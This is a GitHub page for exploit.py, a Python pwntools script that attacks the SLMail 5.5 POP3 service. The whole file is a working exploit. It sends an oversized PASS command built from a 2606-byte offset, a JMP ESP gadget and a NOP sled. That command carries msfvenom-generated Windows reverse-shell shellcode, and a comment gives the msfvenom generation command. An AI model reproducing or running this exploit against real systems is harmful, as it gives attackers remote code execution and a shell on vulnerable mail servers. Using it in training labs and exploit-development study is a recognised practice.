SL-MAIL-5.5-Exploit/exploit.py at main · Chedrian07/SL-MAIL-5.5-Exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *

p = remote("192.168.0.79",110)

context.log_level = "debug"
context.arch = "i386"

buf =  b""
buf += b"\xb8\xdc\xec\x24\xd3\xd9\xe5\xd9\x74\x24\xf4\x5b"
buf += b"\x2b\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\x37"
buf += b"\x10\xc6\x26\x3b\x01\x85\xc9\xc3\xd2\xea\x40\x26"
buf += b"\xe3\x2a\x36\x23\x54\x9b\x3c\x61\x59\x50\x10\x91"
buf += b"\xea\x14\xbd\x96\x5b\x92\x9b\x99\x5c\x8f\xd8\xb8"
buf += b"\xde\xd2\x0c\x1a\xde\x1c\x41\x5b\x27\x40\xa8\x09"
buf += b"\xf0\x0e\x1f\xbd\x75\x5a\x9c\x36\xc5\x4a\xa4\xab"
buf += b"\x9e\x6d\x85\x7a\x94\x37\x05\x7d\x79\x4c\x0c\x65"
buf += b"\x9e\x69\xc6\x1e\x54\x05\xd9\xf6\xa4\xe6\x76\x37"
buf += b"\x09\x15\x86\x70\xae\xc6\xfd\x88\xcc\x7b\x06\x4f"
buf += b"\xae\xa7\x83\x4b\x08\x23\x33\xb7\xa8\xe0\xa2\x3c"
buf += b"\xa6\x4d\xa0\x1a\xab\x50\x65\x11\xd7\xd9\x88\xf5"
buf += b"\x51\x99\xae\xd1\x3a\x79\xce\x40\xe7\x2c\xef\x92"
buf += b"\x48\x90\x55\xd9\x65\xc5\xe7\x80\xe1\x2a\xca\x3a"
buf += b"\xf2\x24\x5d\x49\xc0\xeb\xf5\xc5\x68\x63\xd0\x12"
buf += b"\x8e\x5e\xa4\x8c\x71\x61\xd5\x85\xb5\x35\x85\xbd"
buf += b"\x1c\x36\x4e\x3d\xa0\xe3\xc1\x6d\x0e\x5c\xa2\xdd"
buf += b"\xee\x0c\x4a\x37\xe1\x73\x6a\x38\x2b\x1c\x01\xc3"
buf += b"\xbc\xe3\x92\xcb\x6e\x8c\x18\xcb\x8f\xf5\x94\x2d"
buf += b"\xe5\x15\xf1\xe6\x92\x8c\x58\x7c\x02\x50\x77\xf9"
buf += b"\x04\xda\x74\xfe\xcb\x2b\xf0\xec\xbc\xdb\x4f\x4e"
buf += b"\x6a\xe3\x65\xe6\xf0\x76\xe2\xf6\x7f\x6b\xbd\xa1"
buf += b"\x28\x5d\xb4\x27\xc5\xc4\x6e\x55\x14\x90\x49\xdd"
buf += b"\xc3\x61\x57\xdc\x86\xde\x73\xce\x5e\xde\x3f\xba"
buf += b"\x0e\x89\xe9\x14\xe9\x63\x58\xce\xa3\xd8\x32\x86"
buf += b"\x32\x13\x85\xd0\x3a\x7e\x73\x3c\x8a\xd7\xc2\x43"
buf += b"\x23\xb0\xc2\x3c\x59\x20\x2c\x97\xd9\x50\x67\xb5"
buf += b"\x48\xf9\x2e\x2c\xc9\x64\xd1\x9b\x0e\x91\x52\x29"
buf += b"\xef\x66\x4a\x58\xea\x23\xcc\xb1\x86\x3c\xb9\xb5"
buf += b"\x35\x3c\xe8"
#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST={Attacker IP} LPORT={Liverse_Shell_PORT} -f python -b "\x00\x0a\x0d" -o shellcode

buffer = b"\x41" * 2606 # Offset : 2606
NOP = b"\x90" * 16 #NOP_SLED
gadget = 0x5F4A358F #JMP_ESP : 0x5F4A358F
exploit = buffer + p32(gadget) + NOP + buf

p.recvuntil("OK POP3")

p.send(b"USER Attacker " + b'\r\n')
print(p.recvline())

print("..Send Payload..")
p.recvuntil("welcome")
p.send(b"PASS " + exploit + b'\r\n')

p.interactive()